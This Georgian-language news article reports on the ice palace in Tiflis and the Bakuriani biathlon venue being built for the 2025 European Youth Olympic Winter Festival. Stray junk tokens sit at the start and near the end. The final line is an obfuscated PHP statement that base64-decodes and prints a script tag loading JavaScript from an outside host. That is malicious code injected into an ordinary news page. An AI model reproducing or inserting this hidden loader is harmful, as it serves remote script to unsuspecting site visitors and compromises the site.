celsiusi
ავერსი შნაიდერი

 რეგიონული განვითარებისა და ინფრასტრუქტურის სამინისტროს მუნიციპალური განვითარების ფონდი ევროპის ზამთრის ახალგაზრდული ოლიმპიური ფესტივალისთვის სხვადასხვა სახის ინფრასტრუქტურულ პროექტებს ახორციელებს.

აღნიშნულთან დაკავშირებით ინფორმაციას მუნიციპალური განვითარების ფონდი ავრცელებს.

მათი ცნობით, ევროპის ზამთრის ახალგაზრდული ოლიმპიური ფესტივალისთვის, რომელსაც საქართველო 2025 წლის თებერვალში უმასპინძლებს, დაბა ბაკურიანში ეწყობა ბიატლონისა და თხილამურებით რბოლის (Cross Country) მოედანი და 3 კმ სიგრძის ტრასა. თბილისში კი, შენდება ყინულის სასახლე, რომლის უმაღლესი დონის ტექნიკური სავარჯიშო სტადიონი მოემსახურება ხოკეის, ფიგურული სრიალისა და კერლინგის სპორტის სახეობებს. ორივე პროექტი მიმდინარე წლის ბოლოს დასრულდება.

„საერთაშორისო სტანდარტის თბილისის ყინულის სასახლე 700-მდე მაყურებელზეა გათვლილი. სასახლის შენობაში მოეწყობა ყინულის მოედანი (60მX30), სავარჯიშო, ქორეოგრაფიული და საგრიმიორო დარბაზები, გასახდელები, საკონფერენციო დარბაზი, ინვენტარის შესანახი, დასასვენებელი, სამედიცინო ოთახები და სველი წერტილები. ასევე, გათვალისწინებულია კაფე - მოედნის პანორამული ხედით, ავტოსადგომი და რეკრეაციული ზონა.

შენობაში მონტაჟდება გაგრილების სისტემა, რომელიც უზრუნველყოფს საერთაშორისო სტანდარტის შესაბამის სხვადასხვა ტემპერატურულ რეჟიმს და ყინულის საფარის გაგრილებასთან ერთად, არეგულირებს ტენიანობის დონეს და მაყურებელთა სივრცის გათბობას. მოედანზე დამონტაჟდება ორი ტაბლო და განათების სისტემა.

ყინულის სასახლე აღიჭურვება თანამედროვე (ევროპული წარმოების) ორი ერთეული ყინულის მოედნის მოსავლელი და საპრიალებელი მანქანა-დანადგარით. ასევე, სპეციალიზებული იატაკის იზოლირებული საფარით, რომლის საშუალებითაც, ყინულის საფარის გადნობის გარეშე, მოედანი მოემსახურება საზაფხულო სპორტის სახეობებსა და სხვა სახის ღონისძიებებს (კალათბურთი, მინი ფეხბურთი, ხელბურთი და ა.შ).

მრავალფუნქციური სპორტული კომპლექსი სრულად იქნება ადაპტირებული შეზღუდული შესაძლებლობების მქონე პირებისთვის.

ყინულის სასახლის უახლესი და საერთაშორისო სტანდარტების შესაბამისი ტექნოლოგიებით აღჭურვას და მონტაჟს და ჩეხური კომპანია უზრუნველყოფს.

გამოცდილების გაზიარების მიზნით, მუნიციპალური განვითარების ფონდის აღმასრულებელი დირექტორის პირველმა მოადგილემ გიორგი ციბაძემ, ფონდის თანამშრომლებთან ერთად, ჩეხეთისა და თურქეთის ყინულის მოედნები მოინახულა და ჩეხეთის ხოკეის ფედერაციის წარმომადგენლებს შეხვდა. ჩეხმა სპეციალისტებმა ქართულ მხარეს გაუზიარეს საკუთარი გამოცდილება როგორც ყინულის მოედნების მშენებლობისა და შემდგომი მოვლა-შენახვის თანამედროვე ტექნოლოგიების მიმართულებით. ასევე, გააცნეს მაღალი დონის ჩემპიონატებისთვის განკუთვნილი არენები, ტექნიკური თუ სავარჯიშო მოედნები.

ევროპის ზამთრის ახალგაზრდული ფესტივალის მასპინძლობა და ახალი ინფრასტრუქტურა ხელს შეუწყობს ქვეყანაში ზამთრის სპორტისა და ტურიზმის განვითარებას“, - ნათქვამია გავრცელებულ ინფორმაციაში.

136
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");